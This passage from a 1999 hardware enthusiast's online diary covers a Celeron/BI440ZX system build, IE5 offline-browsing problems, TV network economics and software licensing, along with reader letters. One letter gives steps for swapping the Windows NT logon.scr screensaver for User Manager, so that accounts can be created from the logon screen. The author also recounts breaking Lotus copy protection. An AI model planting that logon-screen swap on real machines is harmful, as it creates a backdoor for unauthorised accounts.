Celeron in this 440ZX/66 motherboard until we obtain at least one matching
pair of Slot 1/Socket 370 Celeron CPUs, we expect any variations to be
Combining the BI440ZX ($100 street, with integrated Creative ES1373
audio) with a $125 PPGA Celeron/400 processor, a $90 stick of SDRAM, a $40
Intel 740 video card, a $125 hard drive, a $20 floppy drive, a $50 CD-ROM
drive, a $30 keyboard, a $30 mouse, and a decent case and power supply
gives you a $800 system that blows the doors off any of the similarly
priced AMD- or Cyrix-based PCs sold at Best Buy and other mass marketers.
Bumping up some of the components and spending a total of $1,000 or $1,100
gives you a system that compares favorably to systems sold by Dell and
Gateway for 30% to 50% more.
The BI440ZX joins the Intel RC440BX and the EPoX BX-T (both Slot 1
boards that include integrated sound and video) as one of the select group
of motherboards we would choose to build a low-cost, high-performance
system for ourselves. This one's a keeper. We're going to make it a
permanent part of our testbench as our Socket 370 test-bed system. Highly
April 8, 1999
One unexpected consequence of Barbara and me both working at home is
that Daylight Saving Time didn't "take." Before the change, we'd
usually awaken around 7:00 to 7:30, take out the dogs, and begin our
morning routine. With the change, everything still works the same, but we
instead get started around 8:00 to 8:30. So the result is that I'm now
running an hour later than I used to. This morning, I got up, read and
responded to the mail from overnight, did a quick read-through of the
manuscript for Pournelle's April column, and then started to update this
page. Here it is 10:45 a.m. already. I suppose that it doesn't matter much
in the end. I'll put in the same number of hours every day. Every time the
time changes I try to convince Barbara that we should run our house on
Zulu time, but I've so far been unsuccessful.
* * * * *
One of the big news items from WinHEC is that Microsoft is flirting
with the idea of Open Source. I don't think so. Microsoft's only interest
in Open Source is how to make it go away or how to co-opt it, not in how
to join the party. If you're expecting to see the source code for NT or
Office any time soon, I'd suggest you not hold your breath. As they have
done all along, Microsoft will release some source code, certainly. But it
will be APIs and other code fragments intended to help third-party
developers code to the proprietary Microsoft core products. And I don't
blame them a bit. That's the same thing I'd do in their position.
* * * * *
AMD now admits that the K7 is not going to ship in June as previously
announced. Their Q1 revenues were down significantly from the same period
last year, they are facing shareholder lawsuits claiming that they did not
disclose their true market position, the limited number of K6-III
processors they are able to ship comes nowhere near meeting demand, and
now their flagship K7 processor is going to be late. Things are not
looking good for AMD.
* * * * *
I'm still mucking about with Internet Explorer off-line browsing. I
can't figure out why I've never been able to synchronize a site
successfully. The status column always reads "Succeeded" but the
additional information column always reads "Updated: Some download
errors". Why is that?
And I've never yet gotten scheduled updates to work properly. I can do
an update manually, but when I try to schedule one, IE5 always reports
"Scheduled updates disabled". I've looked everywhere I can think
of within IE5 to make sure that scheduled updates are in fact enabled, but
nothing seems to work. At one point, I'd about decided that the web sites
I was synchronizing had somehow disabled scheduled updates from their end,
but that doesn't seem to make sense.
Well, make me a liar. I was doing a manual synchronization as I was
writing this. For the first time ever, a synchronize operation just
completed without errors. IE5's off-line browsing would be a wonderful
feature if it worked as intended and worked reliably. This is one of those
Microsoft features that almost but not quite gets it right. I'll keep
playing with it.
* * * * *
More interesting mail today, including one from a reader who still uses
a once-dominant application that I used to use but had almost forgotten.
* * * * *
This from MITCHELL ARMISTEAD [email@example.com]:
I teach software for a living, and thought
you might be interested in this, courtesy of one of my students.
Rename winnt\system32\logon.scr to
...something else. make a copy of winnt\system32\usrmgr.exe named
logon.scr Wait. In a few minutes, usermanager will appear, and allow you
to create accounts.
Well, yes, except that this isn't really a security hole.
The default security on \WINNT\system32\login.scr grants the Full Control
permission only to Administrators and SYSTEM, Change to Server Operators,
and Read to Everyone, so you'd have to have Administrator privileges to
make the change in the first place.
And even if someone set this up and then restarted the
machine, I don't think an unprivileged user who subsequently logged on
would be able to do much with it. I haven't tried it, but I suspect the
unprivileged user would simply be able to use User Manager normally. That
is, to make changes to his own account but not to create or change other
* * * * *
And this followup from Mitch Armistead:
I did a little more checking on this
tonight, and you're correct in that you'd have to be logged on with the
correct permissions to set it up. But, once it is set up, User Manager
for Domains starts automatically, and you can create accounts, and
subsequently log on as those users. I thought it was interesting,
because apparently, any program named login.scr will be run. What if it
was a batch file that copied the contents of a folder somewhere else.
And if auditing on that folder was on, who would the user be since no
one is logged on?
Anyway, I'd never seen this little
"trick", and thought you might find it interesting.
Well, if that's the case, it could indeed be a problem,
although it would require either active collusion or incredible sloppiness
on the part of someone with Administrator privileges. Even so, perhaps you
should report the situation to Microsoft. As far as who the user would be,
my guess is SYSTEM. Thanks for telling me about this.
* * * * *
This from Paul Robichaux [firstname.lastname@example.org]:
I've decided to build a BI440ZX-based system
for a friend who needs a new machine to replace his old Tandy 1000 (no
kidding). Where do you recommend buying pieces-n-parts? I know you have
some local vendors you work with; do you buy everything there, or just
buy based on street price, or what?
Paul Robichaux | email@example.com | http://www.robichaux.net
Robichaux & Associates: programming, writing, teaching, consulting
I never go to the vendor with the lowest price. That way
lies insanity. I tend to deal with the reputable "big-name"
mail-order vendors like NECx, Insight, and PC Connection, who deliver what
they say they will when they say they will, and don't ship you used
components in new shrink-warp.
What I usually do is check out the rock-bottom prices on http://www.pricewatch.com
and then use them to beat up the salespeople at NECx, etc. Within reason,
that is. You can't compare an OEM Celeron from some fly-by-night outfit
with the retail boxed Celeron that NECx or Insight is selling. Sometimes
they'll match or even beat the price, sometimes they'll tell you they
can't go any lower than the advertised price, and sometimes they'll cut
their price some but not all the way to the bottom-feeder price. I almost
always end up buying from one of the three I've mentioned. NECx is
probably the best bet for broad product selection, although Insight comes
close. PC Connection carries less DIY type stuff.
When you choose memory, go for one larger SDRAM stick
rather than two smaller ones. The BI440ZX handles up to 256 MB, but it
only has two DIMM slots.
* * * * *
This from M.F. or M.L. McDonell [firstname.lastname@example.org]:
Hello to you out there on the cutting edge.
Do you remember Lotus ? I have been using it
since 1986 or thereabouts but its popularity has waned over the years.
As you know, it is now a division of IBM.
At CompUSA Reno, I noted the
"Millenium" version of Lotus and saw that I needed to part
with $99 for a Y2K upgrade or start converting my 1-2-3 R5 files to MS
While preparing for this ordeal at home, I
tried the company website and found a Y2K fix was being offered for
On the premise that you might want to
forward this to your readers:
- click on 123 in the left frame
- Select the green button named "News
and Updates" (NOT the green button named "Support" it
won't get you there)
- Scroll downward to the last line that
describes a Y2K Update for Lotus 1-2-3 and click on the link
- Look for the instruction that contains
the link labeled here and click on it.
- A file named 123R5y2k.exe is available
- Lotus/IBM recommends installing
123R5y2k.exe in the x:\123r5\programs
directory (for Release 5.0, another path is suggested for Release
Because I did not read the instructions; I
downloaded the file to the desktop. In Explorer, dragged it to that
directory (which created a shortcut, not a copy) and installed the file
from within the recommended directory. The file is a temporary orphan on
the desktop, as a result.
GARDNERVILLE NV 89410-6006
1 (775) 783-1824
I hadn't thought about Lotus 1-2-3 in years. I haven't used
it in a decade or so, and I think the last version I used was 2.01 for
DOS. In the face of the Excel behemoth, I can't imagine many of my readers
are still using Lotus, but I'll post this for any of those who might be.
April 9, 1999
I've still got more balls in the air than I can comfortably handle.
This coming weekend will be devoted to finishing my taxes, which will
reduce the pressure on me substantially. That means the updates here are
likely to be short, although I'll try to get something up, along with any
interesting mail that come in. Back to work now.
* * * * *
This from Chuck Waggoner [email@example.com]:
Several things I've discovered about
this--and I've used the feature for a long time now.
I still use IE4, so there might be
differences with IE5, but in mine, there is a check box called
"Enable scheduled subscription updates" in the Internet
Properties/Advanced tab, which I get to through Windows Explorer and
right-click for Properties on the Internet Explorer in the left
"All Folders" pane (down near the bottom of the list).
Here are some more things I've learned in
IE4. When a new subscription is activated, on right-click
item/Properties/Schedule tab, it defaults to "Don't update this
subscription when I'm using my computer"--illogical, but it means
it. Actually, you don't have to be sitting there using your computer: if
it is doing something by itself--like indexing Find Fast,--then it
thinks you are using the computer. So, every new subscription needs to
have that box changed. Likewise, if you are connecting with a modem,
that box needs to be checked when creating a new item, as the default is
I get frequent errors, which include: not
being able to open something that says it has been successfully updated
(it tells you that item is not available offline and asks if you want to
connect); items that say they have been updated, but after opening, are
days old with no changes; and items that say 'no changes' but they ARE
updated with changes.
My system goes in through a modem to the
ISP, and IF a dialing attempt to update items fails on first try, 3 or 4
of the items in the update list are marked "error connecting to
Internet"; if it fails on the second attempt, more items are marked
as having failed, and so on, until all the items in the update list are
gone before it has ever connected--then it quits trying. I think I've
mentioned before that, with a modem, IE Subscriptions/Offline updates
and Outlook email checks just can't occur at the same time.
Whichever finishes first, hangs up on the
other. That may not be a problem with your proxy server, but it will be
for anybody using modems. I have the IE updates occur only at the top of
an hour, and start Outlook with Task Manager on the half hour, using an
email check interval like 20, 40, or 60 minutes, which will never hit
on-the-hour. But sometimes--like today--I want to send an email right
away, and I forget to get those email checks back on schedule; sure
enough, after I did that, Outlook hung up on an IE update this morning.
Another problem I experience is that the BBC
News "Front Page" and "Business News" headline
summary pages can only be viewed once offline; after that, I have to
There is some knowledge by the site from
which you are requesting information, that you are doing a
Subscription/Offline update. I used to download 2 cartoons from The New
York Times every weekday, and one day a few months ago, I got a message
reading something like: You cannot automatically download bookmarked
pages--you must visit this page online. Strange that the cartoon pages
seem to be the ONLY ones I can't load, however, and I used to be able to
I do wish Microsoft would give us more
control over what the various Property and setup boxes default to, but
even with all these--what seems to me--correctable-by-Microsoft
problems, it is a real boon to be able to get to what I'm interested in
seeing each day instantly, without having to go online and waiting.
--Chuck Waggoner [firstname.lastname@example.org]
I never used the subscription feature in IE4 much, but I
believe that the off-line browsing feature in IE5 is pretty much the same
except for the name change. I've not had most of the problems you
describe, so perhaps they've at least eliminated many of the bugs. As far
as the dial-up session dropping carrier, have you checked your settings in
Outlook? There's an option somewhere in there that allows you to specify
whether or not Outlook hangs up after it finishes checking mail. I assume
the same is true (somewhere, someplace) for IE. I use the WinGate proxy
server, so my machines are not directly dialed in. Instead, I configure
applications to expect Internet access through a network connection, which
I'm really curious about how web sites discriminate between
a browser doing a page request interactively versus in scheduled update
mode. I mean, I can understand that in scheduled update mode IE might read
and honor robots.txt, but how would it differentiate between synchronizing
on demand or in scheduled mode? Perhaps it ignores robots.txt in on-demand
And I agree that Microsoft should give us many more options
for setting default behavior. If you spend much time cruising the
registry, you'll find that many default behaviors are in fact configurable
if you care to make manual registry changes. There's just nowhere to
change behavior from within a pretty dialog. Sometimes I wonder if these
were things that users didn't need to be changing, or if they were just
too lazy to make an option available to change the setting from within a
* * * * *
Some time ago, I reviewed the book Gates of Fire by Steven Pressfield,
which I liked quite a lot. I received the following message yesterday
evening from someone who really liked the book:
Subject: Gates of Fire, by Steven Pressfield/Commentary by Steffen
This is more than a book. It is a vivid
re-creation of a long-extinct culture whose warrior-ethos now strikes
most people as utterly alien. Yet there was a time--2,478 years
ago--when that culture and the men who lived by its laws were all that
stood between freedom and enslavement for Greece.
Steven Pressfield has done the
impossible--he has allowed us to see ancient Sparta not only through its
own eyes but to make it intelligible to our own.
For example, there is the field-training
scene where Spartan soldiers yell: "This is my shield. I bear it
before me into battle, but it is not mine alone...." Anyone who has
seen Stanley Kubrick's "Full Metal Jacket" will instantly
recall the words shouted on Marine training-grounds: "This is my
rifle. There are many others like it, but this one is mine..."
Thus, Pressfield makes it possible for us to see that elite warrior
units share many of the same characteristics--leadership, discipline and
superior training techniques.
Yet even more fascinating and moving than
the gripping battle-scenes are those of dialogue between leading
characters. The insights offered by Dienekes, greatest of Spartan
warriors, on the meaning of courage ("The oposite of fear is
love") are truly unforgettable. As are the exchanges between his
wife, Arete, and his squire, Xeo Arete's musings on fate ("The gods
will us to love whom we will not, and disrequite those we will")
are as profound and moving as Herodotus' putting into the mouth of
Solon: "Look to the end, then, whatever you are considering. Often
enough, the gods give a man a gleam of happiness, and then utterly ruin
This is a book meant to last--to be
cherished and re-read by anyone who loves ancient history--and anyone
who seeks truths about human nature and to what heights men and women
can rise when they place their courage in service to a worthy cause.
Not to trivialize, but now I have the modern version of the
chant running through my head, "This is my rifle. This is my gun.
This one's for fighting. This one's for fun."
April 10, 1999
FedEx showed up yesterday with a box from OnStream that contained a
DI30 tape drive and several tapes. What I want to do this weekend is
install the tape drive and work with it. What I'm going to do instead is
my taxes. Ugh. Don't expect much here tomorrow.
* * * * *
As my regular readers will remember, I despise television commercials.
So I found an article in the business section of yesterday's newspaper
quite cheering. Most people would assume that local television stations
pay the network for the right to run network shows. In fact, the situation
is exactly the reverse. The network pays the local affiliates to run
network programming. The network sells commercials to national advertisers
and uses part of that revenue to pay the local stations to run the shows.
That way, many people see the commercials the network sold.
But the network doesn't sell all of the available commercial slots.
They leave some empty, which can then be sold directly by the local
station to local and other advertisers. The Fox network apparently is
unilaterally reducing the number of these vacant commercial slots
available to the local stations from about 70 per week to 50 per week. By
selling those additional 20 slots directly, the network will increase its
revenue by an amount variously estimated at $100 million to $200 million
annually. Obviously, the local affiliates are upset about this, but
there's not much they can do about it.
Upsetting its affiliates is not a wise thing for a network to do, but
apparently Fox has little choice. Their revenues are dropping for two
reasons, and they have to do something about it. Reason One is that TV
shows are costing more and more to produce. The $13 million per episode
cost of ER is an extreme example, but the cost of producing any show has
been increasing faster than inflation for a long time now. Reason Two is
that network viewership is dropping substantially every year, which in
turn means that advertisers are paying less for commercials that are seen
by fewer people.
Even worse, the demographics of network viewership are changing for the
worse as far as advertisers are concerned. Advertisers want the people who
see their commercials to be good prospects--likely and able to buy the
advertised product. What that really means is that they want suburban,
middle-class viewers in the 25-49 age group. By and large, older people
are already set in their ways and less likely to be influenced by
commercials. Younger ones are less likely to have the economic wherewithal
or the decision making role. But network demographics are going into the
toilet. Middle-class, 25 to 49 viewers are abandoning network television
in droves for cable and videos. Network viewership is increasingly young,
poor, and urban, none of which are markets targeted by most advertisers.
And all of this contributes to a downward spiral. Shows designed to
appeal to the middle-class, suburban 25 to 49 people are getting less
viewership and so are increasingly being replaced by shows intended to
appeal to what viewers the networks have left. This in turn makes the
desired viewers even less likely to tune in, and makes it more likely that
shows for the 25-49's will be replaced by shows intended to appeal to the
poor, urban, under-25 viewers. Ultimately, this probably means that
network television cannot survive with a model based on advertising
revenue, or so I hope. Loud cheers. I hope that "free"
commercial television disappears completely, to be replaced by 100%
* * * * *
This from John Tucker [email@example.com]:
Been reading your site for a while now, and
enjoying it. When I received the following I thought that it might be
something you'd appreciate. I have no idea as to the veracity of the
information yet it seems to be plausible. At the very least its good for
During the heat of the space race in the
1960s, the U.S. National Aeronautics and Space Administration realised
that astronauts would have to be able to record certain things while
performing their duties and so it needed a writing utensil capable of
writing in the zero gravity confines of its space capsules. Of Course, a
normal pen will not work since they are all gravity fed. After
considerable research and development spanning over two years, the
working zero-g Astronaut Pen was developed at a cost of approximately
$US1 Million (in 1960's dollars !!). The initial production run was
fifty pens. The Soviet Union was faced with the same problem...but they
No reply necessary.
I believe it, although it's incredible to me that it could
require $1,000,000 worth of R&D to pressurize the ink cartridge
slightly. Perhaps there's more to it than that. I also recall discussion
during the Gemini program in the early- to mid-60's. They were at that
time preparing for the first extra-vehicular activity (EVA). Obviously,
they didn't want the astronaut to drift away from his craft, so they
needed some means of making sure he stayed connected. What they came up
with, at significant cost, was an innovative hi-tech device called a
"flexible tether." To normal people, of course, it was
indistinguishable from a rope.
* * * * *
And this response from Jerry Pournelle [firstname.lastname@example.org]:
Actually that tether was not quite as simple
to design as you think, and the real cost was in testing it and being
able to disconnect, and where it would attach, and what if the astronaut
died or became unconscious, and other stuff. I worked on that program.
And we considered pencils and shavings and
sharpening and shuddered. True, there were more people charging off on
that program than should have, but in part it's because a lot of human
factors people needed a budget number and the food program was over
I figured it was something like that. Heck, I was only 12
years old at the time. I'm surprised I even remember those details. I
wonder if anyone considered using a mechanical pencil.
* * * * *
This followup from Jerry Pournelle [email@example.com]:
Yeah, we didn't like the notion of graphite,
and there was the business of eraser dust. Not giving them an eraser
would help. But it was decided to bite the bullet and design something
once and for all.
There's a lot of waste, but it's mostly that you have people you can't
fire so they may as well work on one thing as another. Then you charge
them to that project.
Okay. That makes sense. Actually, I know enough about cost
accounting to appreciate what you're saying. I've often made the point to
people railing on about $600 toilet seats that the situation is analogous
to someone who contracts to have a house built and then, when the house is
almost complete, insists that one concrete block in the foundation be
removed and replaced with a different one. The contractor tears down the
house, replaces the concrete block, and rebuilds the house to where it
was. The newspapers report that that contractor charged $100,000 for a
concrete block. Sometimes you can't win.
* * * * *
This from Bo Leuf [firstname.lastname@example.org]:
"Whichever finishes first, hangs up on
the other. That may not be a problem with your proxy server, but it will
be for anybody using modems."
Oh yes, I have noticed this. If an IE5
window is open, and I'm using something else on the dial-up (ftp, Opera,
OL), after the present time (20 minutes) this dialog pops up saying that
the connection hasn't been active recently (never mind any other
activity on the line), asking shall it be closed, with an automatic
countdown to actually close the connection -- such rudeness! The first
time I got very confused, because I was doing a lengthy ftp download,
and had I not been there, this download would have been cut off in mid-
transfer. The dialog was anonymous, so it took a while to realize that
it was IE triggering it. Interestingly, it doesn't matter whether IE
starts the dial-up session or not, it just blithely assumes somehow that
it is the only application using the connection and is therefore fully
competent to decide that it can be terminated just because nobody is
browsing in IE.
"Bo Leuf" email@example.com
Leuf Network, www.leuf.net
I used to have a full-time Internet connection, so I never
noticed that. For a very short time, I used direct dial-up from my main
workstation. Then I installed WinGate, which now provides a shared
Internet connection to all the machines on my network. While I was using
the direct dial-up, I lied to Outlook and told it that it had a network
connection. I then made the connection manually before checking mail. I
don't think I ever experienced the problem you describe, so that wasn't
why I told Outlook it had a network connection.. I just didn't want
Outlook or IE doing my dialing for me.
Now, I have WinGate setup to time out after 30 minutes of
inactivity. I have Outlook set to check mail every five or ten minutes, so
my connection stays up all day long. Even if I close Outlook, chances are
that Barbara will have her Outlook open, or that one of us will be on the
web or doing something else that keeps traffic flowing. BellSouth.net says
unlimited use, and I take them at their word. They do drop a connection
after 12 hours no matter what's going on at the moment, so I'm pretty
careful about that. They once dropped a connection that reached 12:00
duration when I was 26 MB into a 27 MB download.
* * * * *
This from M.F. or M.L. McDonell [firstname.lastname@example.org]:
Where I used to work, I introduced Lotus
2.01 to the staff in 1989. It was a government job, so they had no $ for
silly new stuff. I lent the office my IBM-XT (really); on which my only
copy of Lotus was installed. Remember the installation counter switch?
Do you remember the flashing "Wait" light as simple
calculations were generated?
When we purchased that XT, it cost a small
fortune. The company I worked for at that time required my work to be
done on a PC but refused to buy me one. Thus, I had to wait until after
hours and use someone else's machine. A different seller (now long
defunct) tried to tell us that IBM would not honor their warranty if we
used anything but IBM software. Scared us to death until he realized we
were not a corporation and refused to sell us anything! Imagine that!
Meanwhile, the office staff took to the PC
and they generated a whopping amount of files in Lotus. As you know,
Excel prevailed and it can open and convert Lotus files. Unfortunately,
many of the functions are not the same and the operator must contend
with a time-consuming rewriting of the equations; which come through
like this ############. A big help, those folks at Microsoft. Well, I
found out last year that those bureaucrats were trying to justify a new
PC, just to perform those conversions!! I yelled like hell and ordered a
Lotus 97 disk. They were astounded to find out that IBM was supporting,
even upgrading, 1-2-3. They got the PC anyway.
The reason for the archive was that the 1990
era templates I designed for them would not wear out. Also, they could
not bear to erase files once a hard copy was produced. Then, they
produced variants (my masters were locked). Errors crept in. It was
In 1997, I recovered the XT and they
complained. I gave the IBM to the county library; which had the good
sense to throw it away. I kept that copy of Lotus 123 Ver 2.01 as a
memento of the dark ages. I now use Version 5.
I remember the installation counter. At that time, I was
working for the Forsyth County MIS Department, and we were just starting
to deploy PCs in large numbers. Well, large for us at the time. We were
getting PCs in ten and twenty at a time. We didn't have the staff to
co-ordinate copy-protected software, so we used the PC Tools copy
protection breaker (Copy2PC?) to fix the Lotus 2.01 executable. That way,
we could create a master configuration on the hard disk of one machine,
back it up (to floppies) and then restore that master set to each new PC.
We still purchased a legal copy of Lotus for each machine, but we just
stuck the disks in their sealed envelopes on the shelf so that we could
prove we were legal if it ever came to that.
Before that, I worked for an Entre Computer Center. We'd
had so many problems with Lotus copy protection that we routinely broke
the copy protection before we installed the product for customers. We
didn't tell them we'd broken the copy protection, but we did it just the
same. We'd had so many needless service calls that were caused by Lotus
copy protection that we did it in self defense. Something as simple as
restoring a backed up copy of the program would wipe out the counter and
render the product unusable. I'm glad the days of copy protection ended,
but it appears that copy protection may be returning, and the Intel CPU
serial number may be the hook that allows it to.
April 11, 1999
I spent all day yesterday working on taxes, and I'm not finished yet.
The good news, I suppose, is that for the first time in years I'll be
getting a refund instead of having to write a multi-thousand dollar check
to the feds. On the other hand, that means they've had my money
interest-free all year.
The first pass on the federal taxes is done. Today, I'll do the second
pass, checking carefully for missed deductions, etc. and then do the
state. I really want to move to a state that has no income tax. The
federal income tax is unavoidable, but there are any number of states that
don't have one. Back to it. I'm in my usual bad mood for mid-April.
* * * * *
This from Scott Kitterman [email@example.com]:
I just finished reading Black Hawk Down.
Although a different story of a different era, it reminds me of Gates of
Fire in the way it transports you into the action. Highly recommended.
Here is a review:
I looked at the review and the book does sound interesting.
I doubt I'll get time to read it, however. Thanks for letting me know.
* * * * *
This from Bo Leuf [firstname.lastname@example.org]:
"I'm glad the days of copy protection ended, but it appears
that copy protection may be returning, and the Intel CPU serial number
may be the hook that allows it to."
Not a pleasant prospect. So what do you
suppose will then happen to the people who for various reasons get their
CPU (or system) replaced? I shudder at the here implied scenario where
you have your system serviced/upgraded in some way and this immediately
breaks all installed software, perhaps even the OS, with say an
aggressive error message saying at bootup that the installation is an
illegal copy. Or perhaps more subversively would still allow normal
bootup and use, but then invisibly go out on the Net at first
opportunity and reports its "illegal" status directly to
whomever. I am also reminded of some shareware products that showed
buggy registration routines, where for example a netmessage editor would
user-unknowingly, and sometimes incorrectly, append the tagline
"this is an unregistered and illegal copy of XXX" or the
"Bo Leuf" email@example.com
Leuf fc3 Consultancy
Exactly. The Pentium II/III serial number in conjunction
with the increasing trend toward forced registrations, which I've railed
about in the past, means that changing your CPU (or upgrading to a new
system) will mean that you have to contact software vendors for a new init
key. If this becomes ubiquitous, it's possible that many people who have
many software products installed may have to spend literally days on the
phone just getting those new init keys, if indeed the software
manufacturer's are willing to provide them. We may find that software is
now being licensed to a particular CPU.
And if you think that's ridiculous, note Microsoft's
slipstreamed license change. It used to be that they licensed software for
one PC. That meant, for example, that if I bought a system with a bundled
Windows 95 license and decided to use that machine to run Linux, I could
then use that Windows 95 license on another machine. Microsoft's new
license changes that. It now licenses software to a particular computer.
If I buy a new machine with a Windows 98 license, I can use that license
only on that particular machine. If other software manufacturers begin
licensing their software this way, we may find that replacing the CPU or
upgrading to a new machine will require us to buy new licenses for all our
That's the real reason I'm following Linux with so much
interest. Right now, Linux is a usable server OS, but isn't ready for
prime time as a client OS. But as applications (and particularly graphics
shells) for Linux become more refined over the next year or two, I may
make the shift entirely to Linux. Ultimately, I think Microsoft's goal is
to rent software to us. I don't want to pay Microsoft an annual rental fee
for each application.